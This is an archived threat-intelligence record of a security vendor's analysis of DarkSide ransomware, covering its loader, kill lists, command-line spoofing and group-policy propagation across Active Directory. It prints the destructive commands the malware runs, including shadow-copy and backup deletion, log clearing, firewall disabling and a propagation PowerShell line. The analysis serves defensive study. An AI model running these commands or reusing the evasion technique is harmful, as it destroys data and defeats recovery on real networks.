{
	"id": "d855812c-9068-4bbc-8ca6-e3efc5e61102",
	"created_at": "2026-04-06T00:21:53.177161Z",
	"updated_at": "2026-04-10T03:20:05.545611Z",
	"deleted_at": null,
	"sha1_hash": "bf45ca88acea6e7ff509ad47695c019f46978bbf",
	"title": "DarkSide Ransomware With Self-Propagating Feature in AD Environments",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2838934,
	"plain_text": "DarkSide Ransomware With Self-Propagating Feature in AD Environments\r\nBy ATCP\r\nPublished: 2023-02-06 · Archived: 2026-04-05 23:36:45 UTC\r\nIn order to evade analysis and sandbox detection, DarkSide ransomware only operates when the loader and the data file are both present. The loader, named “msupdate64.exe”, reads the “config.ini” data file in the same path, which contains the encoded ransomware, and runs the ransomware in the memory of a normal process. The ransomware is structured to operate only when a specific argument matches. It then registers itself with the task scheduler and runs itself periodically.\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 1 of 15\r\nFigure 1. Ransomware operation method\r\nThe following are the features of DarkSide ransomware.\r\n1) Ransomware Encryption Target Exception List\r\nAfter being injected into a normal process, the ransomware encrypts all files aside from those with certain folder and file names. Tables 1 and 2 contain the folder paths and filenames excluded from encryption.\r\nFolder Paths Excluded From Encryption\r\n“AppData”\r\n“Boot”\r\n“Windows”\r\n“WINDOWS”\r\n“Windows.old”\r\n“Ahnlab”\r\n“Tor Browser”\r\n“Internet Explorer”\r\n“Google”\r\n“Opera”\r\n“Opera Software”\r\n“Mozilla”\r\n“Mozilla Firefox”\r\n“$Recycle.Bin”\r\n“ProgramData”\r\n“All Users”\r\n“Program Files”\r\n“Program Files (x86)”\r\n“#recycle”\r\n“..”\r\n“.”\r\n“SYSVOL”\r\n“bootmgr”\r\n“ntldr”\r\nTable 1. List of folder paths excluded from encryption\r\nFilenames Excluded From Encryption\r\n“autorun.inf”\r\n“boot.ini”\r\n“bootfont.bin”\r\n“bootsect.bak”\r\n“bootmgr.efi”\r\n“bootmgfw.efi”\r\n“desktop.ini”\r\n“iconcache.db”\r\n“ntuser.dat”\r\n“ntuser.dat.log”\r\n“ntuser.ini”\r\n“thumbs.db”\r\n“AUTOEXEC.BAT”\r\n“autoexec.bat”\r\n“bootfont.bin”\r\n“bootfont.bin”\r\n“ntldr”\r\n“config.ini”\r\n“begin.txt”\r\n“finish.txt”\r\nTable 2. List of filenames excluded from encryption\r\n2) Force Terminate Running Processes\r\nThe ransomware terminates running processes in order to prevent file-handling conflicts during the encryption process. The following is a list of those targets.\r\nForce Terminated Processes\r\n“sql.exe”\r\n“oracle.exe”\r\n“ocssd.exe”\r\n“dbsnmp.exe”\r\n“synctime.exe”\r\n“agntsvc.exe”\r\n“isqlplussvc.exe”\r\n“xfssvccon.exe”\r\n“mydesktopservice.exe”\r\n“ocautoupds.exe”\r\n“encsvc.exe”\r\n“firefox.exe”\r\n“tbirdconfig.exe”\r\n“mydesktopqos.exe”\r\n“ocomm.exe”\r\n“dbeng50.exe”\r\n“sqbcoreservice.exe”\r\n“excel.exe”\r\n“infopath.exe”\r\n“msaccess.exe”\r\n“mspub.exe”\r\n“onenote.exe”\r\n“outlook.exe”\r\n“powerpnt.exe”\r\n“steam.exe”\r\n“thebat.exe”\r\n“thunderbird.exe”\r\n“visio.exe”\r\n“winword.exe”\r\n“wordpad.exe”\r\n“wrapper.exe”\r\n“dbsrv12.exe”\r\n“WinSAT.exe”\r\nTable 3. List of processes to be force terminated\r\n3) Service Termination Targets\r\nThe ransomware stops backup services and services related to AV products. Table 4 is a list of such targets.\r\nTerminated Services\r\nvss\r\nsql\r\nsvc$\r\nmemtas\r\nmepocs\r\nsophos\r\nbackup\r\nGxCIMgr\r\nDefWatch\r\nccEvtMgr\r\nccSetMgr\r\nSavRoam\r\nRTVscan\r\nQBFCService\r\nQBIDPService\r\nIntuit.QuickBooks.FCS\r\nQBCFMonitorService\r\nYooBackup\r\nzhudongfangyu\r\nstc_raw_agent\r\nVSNAPVSS\r\nVeeamTransportSvc\r\nVeeamDeploymentService\r\nVeeamNFSSvc\r\nPDVFSService\r\nBackupExecVSSProvider\r\nBackupExecAgentAccelerator\r\nBackupExecAgentBrowser\r\nBackupExecDiveciMediaService\r\nBackupExecJobEngine\r\nBackupExecManagementService\r\nBackupExecRPCService\r\nAcrSch2Svc\r\nAcronisAgent\r\nCASAD2DWebSvc\r\nCAARCUpdateSvc\r\nTable 4. List of services to be terminated\r\n4) Delete Volume Shadows, Suspend Windows Event Logging, and Deactivate Windows Recovery\r\nThe threat actor uses tools such as vssadmin.exe to perform acts like deleting volume shadow copies, but bypasses command line-based behavior detection by using the following method.\r\nEach process is created in suspended mode, with garbage values like “11111111” given as its command line arguments. Afterward, the address of the command line is obtained by reading the PEB from the memory of that process and locating the RTL_USER_PROCESS_PARAMETERS struct. Finally, WriteProcessMemory() is used to overwrite the actual command line argument at the obtained address, so tools like vssadmin.exe run normally with the newly written argument while the process creation log still shows the garbage value.\r\nFigure 2. Original command line\r\nFigure 3. Command line argument being changed\r\nFigure 4. Changed command line argument\r\nProcess Execution Log | Actual Command Line\r\nvssadmin.exe 11111111111111111111111111 | vssadmin.exe Delete Shadows /All /Quiet\r\nbcdedit.exe 111111111111111111111111111111111 | bcdedit.exe /set {default} recoveryenabled No\r\nbcdedit.exe 1111111111111111111111111111111111111111111111111 | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nwbadmin.exe 111111111111111111111111 | wbadmin.exe DELETE SYSTEMSTATEBACKUP\r\nwbadmin.exe 11111111111111111111111111111111111111 | wbadmin.exe DELETE SYSTEMSTATEBACKUP -deleteOldest\r\nwbadmin.exe 111111111111111111111 | wbadmin.exe delete catalog -quiet\r\nwbadmin.exe 1111111111111 | wbadmin.exe delete backup\r\nwbadmin.exe 1111111111111111111111111111111111111111 | wbadmin.exe delete systemstatebackup -keepversions:0\r\nwevtutil.exe 111111111111111111111 | wevtutil.exe clear-log Application\r\nwevtutil.exe 111111111111111111 | wevtutil.exe clear-log Security\r\nwevtutil.exe 1111111111111111 | wevtutil.exe clear-log System\r\nwevtutil.exe 111111111111111111111111111111 | wevtutil.exe clear-log \"windows powershell\"\r\nwmic.exe 1111111111111111111111111 | wmic.exe SHADOWCOPY /nointeractive\r\nnet.exe 1111111111 | net.exe stop MSDTC\r\nnet.exe 1111111111111111111 | net.exe stop SQLSERVERAGENT\r\nnet.exe 1111111111111111 | net.exe stop MSSQLSERVER\r\nnet.exe 11111111 | net.exe stop stop vds\r\nnet.exe 11111111111111 | net.exe stop SQLWriter\r\nnet.exe 111111111111111 | net.exe stop SQLBrowser\r\nnet.exe 1111111111111111 | net.exe stop MSSQLSERVER\r\nnet.exe 1111111111111111111 | net.exe stop MSSQL$CONTOSO1\r\nnetsh.exe 1111111111111111111111111111111111111111 | netsh.exe advfirewall set currentprofile state off\r\nnetsh.exe 11111111111111111111111111111111 | netsh.exe firewall set opmode mode=disable\r\nTable 5. Actually executed command lines\r\nFigure 5. AhnLab EDR detecting abnormal process executions from Table 5\r\nFigure 6. AhnLab MDS detecting execution and data written in memory\r\nThe AhnLab EDR/MDS line of products considers executions like the ones above as abnormal executions. MDS products can also inspect the data that is written to the target process's memory.\r\nWritten data\r\n76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c\r\n00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00\r\n6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 00\r\nCommand the above data decodes to (UTF-16LE)\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nTable 6. Command written in the memory\r\n5) Ransom Note and File Encryption Extension\r\nThe ransomware generates a ransom note file called “_r_e_a_d_m_e.txt”, like the one shown in Figure 7, in each encrypted folder.\r\nFigure 7. Ransom note\r\nAdditionally, the ransomware changes the extension of encrypted files to “.s1s2s3[number of encrypted files]”.\r\n6) Self-deleting Ransomware\r\nAfter the ransomware finishes its actions, it attempts to delete itself through the following command.\r\nSelf-deletion Command\r\n\"C:\\Windows\\System32\\cmd.exe\" /c ping 127.0.0.1 -n 3 \u0026\u0026 del /f/q \"C:\\Users\\Default\\Desktop\\msupdate64.exe\"\r\nTable 7. Self-deletion command\r\nFigure 8. AhnLab MDS detecting self-deletion command\r\nFigure 9. AhnLab EDR detecting self-deletion command\r\nInternal Propagation (Ransomware Distribution Method Through Domain Controller)\r\nWhen this ransomware becomes active on the domain controller of an AD server, it creates a group policy as shown in Figure 9 to distribute the ransomware to other PCs joined to the current domain.\r\nFigure 10. Ransomware distribution method through domain controller\r\nTable 8 shows a file-related group policy which gives the command to copy the executable file from the ransomware's domain controller to the desktops of infected PCs with the name format “[Distribution Date]_[Ransomware Filename].exe”.\r\n{D6C45CD3-BCB9-4D6C-A16C-FD416DAA1C47}\\User\\Preferences\\Files\\Files.xml\r\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\r\n\u003cFiles clsid=\"{215B2E53-57CE-475c-80FE-9EEC14635851}\"\u003e\u003cFile clsid=\"{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}\" name=\"[Distributed Date][Ransomware Filename].exe\" status=\"[Distribution Date][Ransomware Filename].exe\" image=\"2\" changed=\"[Distribution Date]\" uid=\"{1F86D6A8-6640-47D8-A26B-E263CAECE394}\" bypassErrors=\"1\"\u003e\r\nTable 8. Group policy that generates ransomware executable file\r\nFigure 11. AhnLab EDR detecting the execution of ransomware generated through a group policy\r\nDarkSide will not operate if a certain argument, intended to prevent replication and analysis, does not match. However, as shown in Figure 10, AhnLab EDR detects ransomware strains generated through group policies in AD environments. It is also possible to check the arguments at the point of execution.\r\nFor continuous propagation, the ransomware distributes group policies with the following command.\r\nPowerShell command\r\npowershell.exe -Command \"Get-ADComputer -filter * -Searchbase 'DC=ahnlabs,DC=com' | foreach{ Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}\"\r\nTable 9. Propagation command\r\nFigure 12. AhnLab EDR detecting the distribution of group policies using PowerShell\r\nThe threat actor that performs an APT attack on the AD environments of companies for monetary gain distributes their malware after checking whether all AV products detect it based on existing signatures.\r\nFigure 13. DarkSide ransomware not found by VirusTotal\r\nAs shown in Figure 13 above, there is a great chance that DarkSide ransomware can evade detection by AV products based on existing signatures, since it has not even been collected by VirusTotal.\r\nThe importance of an APT detection solution like MDS and EDR, which records and reports all suspicious behaviors on endpoints, becomes clear when trying to detect this threat effectively.\r\nFigure 14. DarkSide ransomware detected on AhnLab MDS\r\nFigure 15. DarkSide ransomware detected on AhnLab EDR\r\nDarkSide ransomware attacks correspond to the following techniques in the MITRE ATT\u0026CK framework.\r\nT1486 Data Encrypted for Impact[1]\r\nT1484.001 Domain Policy Modification: Group Policy Modification[2]\r\nT1053.005 Scheduled Task/Job: Scheduled Task[3]\r\nT1562.001 Impair Defenses: Disable or Modify Tools or T1489 Service Stop[4]\r\nT1489 Service Stop[5]\r\nT1021.002 Remote Services: SMB/Windows Admin Shares[6]\r\nT1562.001 Impair Defenses: Disable or Modify Tools[7]\r\nSubscribe to AhnLab's next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.\r\nSource: https://asec.ahnlab.com/en/47174/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/47174/"
	],
	"report_names": [
		"47174"
	],
	"threat_actors": [],
	"ts_created_at": 1775434913,
	"ts_updated_at": 1775791205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bf45ca88acea6e7ff509ad47695c019f46978bbf.pdf",
		"text": "https://archive.orkl.eu/bf45ca88acea6e7ff509ad47695c019f46978bbf.txt",
		"img": "https://archive.orkl.eu/bf45ca88acea6e7ff509ad47695c019f46978bbf.jpg"
	}
}